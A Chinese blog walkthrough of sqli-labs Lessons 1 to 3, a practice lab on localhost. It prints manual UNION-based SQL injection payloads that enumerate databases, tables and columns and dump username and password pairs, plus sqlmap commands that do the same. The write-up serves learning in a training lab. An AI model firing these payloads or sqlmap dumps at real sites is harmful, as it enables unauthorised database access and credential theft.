刚刚做完sqli-labs的第一节的第一题(QAQ)
我的时间呀!!!(太笨只能一步一步的往前走)
我使用了两种方法解决的这一题,希望能够帮助到你们
题目是 :GET Error based- Single quotes -String
解题链接:http://127.0.0.1/sqli-labs-master/Less-1/
关注点:基于错误,单引号,字符型注入。
手工注入:
payload1:http://127.0.0.1/sqli-labs-master/Less-1/?id=0
页面正常:

payload2:http://127.0.0.1/sqli-labs-master/Less-1/?id=0‘
页面返回错误(可以判断有字符型的注入)
使用UNION SELECT 或者 ORDER BY 语句进行查询字段数:
payload3:http://127.0.0.1/sqli-labs-master/Less-1/?id=0‘ UNION SELECT 1,2,3 --+
然后就可以查询数据库的名称
payload4:http://127.0.0.1/sqli-labs-master/Less-1/?id=0‘ union select 1,group_concat(schema_name),3 from information_schema.schemata --+
这里是利用元数据表INFORMATION_SCHEMA获取数据库信息。
获取表名:
payload5:http://127.0.0.1/sqli-labs-master/Less-1/?id=0‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

这里 hex(security)=0x7365637572697479(进行十六进制的转换)
payload6:http://127.0.0.1/sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x7573657273--+
最后就是进行数据的查询:
payload7:http://127.0.0.1/sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat(username,0x3a,password,0x20),3%20from%20security.users%20--+
sqlmap工具注入:
首先进行数据的查询:
payload1:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=0" --technique UE --dbms mysql --dbs --batch
payload2:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=0" --technique UE --dbms mysql -D security --tables --batch
字段信息的查询:
payload3:python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=0" --technique UE --dbms mysql -D security -T users --columns --batch
最后就会得到具体的答案了:
payload4;python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=0" --technique UE --dbms mysql -D security -T users -C username,password --dump --batch
第二题:http://127.0.0.1/sqli-labs-master/Less-2/
由于题目说是数值型注入。 所以不需要闭合引号。
其它的过程和第一题一样的:
直接给出最后的payload:http://127.0.0.1/sqli-labs-master/Less-2/?id=0%20UNION%20SELECT%201,GROUP_CONCAT(username,0x3a,password,0x20),3%20FROM%20security.users%20--+

第三题:http://127.0.0.1/sqli-labs-master/Less-3/
首先:进行一下手工注入:
payload:http://127.0.0.1/sqli-labs-master/Less-3/?id=1%27
注意到报错回显中有 ),说明需要闭合。
手工注入:
payload:127.0.0.1/sqli-labs-master/Less-3/?id=0‘) UNION SELECT 1,GROUP_CONCAT(username,0x3a,password,0x20),3 FROM security.users --+
这个地方本来想放图片的,但是不知道怎么会被吞了
博主整理不易,如果喜欢推荐关注一下博主哦!
微信:liu1263030049
加好友前请注明原因谢谢
原文:https://www.cnblogs.com/lxz-1263030049/p/9363151.html